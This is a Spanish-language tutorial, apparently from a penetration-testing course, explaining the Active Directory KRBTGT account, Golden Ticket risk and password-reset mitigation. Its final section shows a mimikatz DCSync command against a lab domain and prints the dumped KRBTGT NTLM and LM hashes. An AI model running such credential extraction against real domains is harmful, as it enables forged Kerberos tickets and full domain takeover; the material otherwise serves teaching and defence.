¿Que es KRBTGT?

La cuenta KRBTGT es una cuenta de usuario del sistema en el dominio de Active Directory que es creada automáticamente cuando se instala el dominio. Es una cuenta crucial para el correcto funcionamiento de la autenticación Kerberos en un dominio de Windows.

Aquí están los puntos claves de la cuenta KRBTGT:

1. Función en Kerberos:

   • KRBTGT es el principal de seguridad para el servicio de Kerberos en un dominio de Active Directory.

   • Se usa para firmar y cifrar todos los Ticket Granting Tickets (TGT) emitidos por el servicio de Kerberos dentro del dominio.

   • Cuando un usuario se autentica a través de Kerberos, se le entrega un TGT cifrado y firmado que acredita su identidad frente al Ticket Granting Service (TGS).

2. Seguridad de la cuenta:

   • La cuenta KRBTGT tiene un conjunto de credenciales asociadas (es decir, un hash de contraseña), que son usadas para proteger los TGT.

   • La contraseña de esta cuenta no se utiliza para la autenticación interactiva, y normalmente no se cambia regularmente, aunque las buenas prácticas de seguridad recomiendan cambiarla al menos una vez cada cierto tiempo (especialmente después de un incidente de seguridad).

3. Riesgos de seguridad:

   • Si un atacante obtiene el hash de la contraseña de la cuenta KRBTGT, puede generar Golden Tickets, que permiten una amplia libertad para autenticarse en cualquier parte del dominio como cualquier usuario.

   • Es esencial mantener la seguridad de esta cuenta, ya que su compromiso puede resultar en una pérdida total del control sobre los recursos de Active Directory.

4. Medidas de protección:

   • La cuenta KRBTGT está deshabilitada para el inicio de sesión, lo que significa que no se puede usar para acceder a un sistema de forma interactiva o a través de la red.

   • Debe ser protegida con una contraseña fuerte y compleja, y como medida de mitigación contra los ataques de Golden Ticket, se recomienda cambiar su contraseña dos veces en una rápida sucesión como parte de una corrección tras un incidente de seguridad.

Es fundamental para los administradores de Active Directory entender el rol y la importancia de la cuenta KRBTGT para mantener la integridad y seguridad del proceso de autenticación Kerberos en sus redes.

Teniendo en cuenta lo explicado en DCSync podemos obtener el HASH de KRBTGT: Para realizar un DCSync podriamos realizarlo para extraer la informacion de un usuario en especifico o de todos los usuarios:

PS C:\> .\mimikatz.exe

mimikatz # lsadump::dcsync /domain:spartancybersec.corp /user:krbtgt
[DC] 'spartancybersec.corp' will be the domain
[DC] 'First-DC.spartancybersec.corp' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 9/19/2022 11:34:18 PM
Object Security ID   : S-1-5-21-1861162130-2580302541-221646211-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: b44daa015f201fa31126895ebbcbbcab
    ntlm- 0: b44daa015f201fa31126895ebbcbbcab
    lm  - 0: 216e51b46d2f3117bfb04f5b1aeef460

El Hash NTLM de KRBTGT seria: b44daa015f201fa31126895ebbcbbcab